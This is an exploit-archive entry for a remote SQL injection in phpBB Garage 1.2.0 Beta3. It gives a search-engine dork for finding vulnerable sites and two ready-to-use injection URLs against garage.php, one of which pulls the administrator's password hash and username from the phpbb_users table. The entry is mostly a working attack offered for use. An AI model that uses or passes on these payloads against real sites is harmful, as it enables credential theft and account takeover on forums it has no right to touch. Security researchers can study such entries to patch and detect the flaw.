phpBB Garage 1.2.0 Beta3 Remote SQL Injection Vulnerability

2007-12-03T00:00:00
ID 1337DAY-ID-2336
Type zdt
Reporter maku234
Modified 2007-12-03T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===========================================================
phpBB Garage 1.2.0 Beta3 Remote SQL Injection Vulnerability
===========================================================



Title: phpBB Garage v1.2.0 - Beta3 Remote SQL Injection Vulnerability
Dork:  "Powered By phpBB Garage 1.2.0"

Author:  maku234



garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/1,2/*
garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/concat(user_password,char(94),username),2/**/from/**/phpbb_users/**/where/**/user_id=2/*



#  0day.today [2018-01-05]  #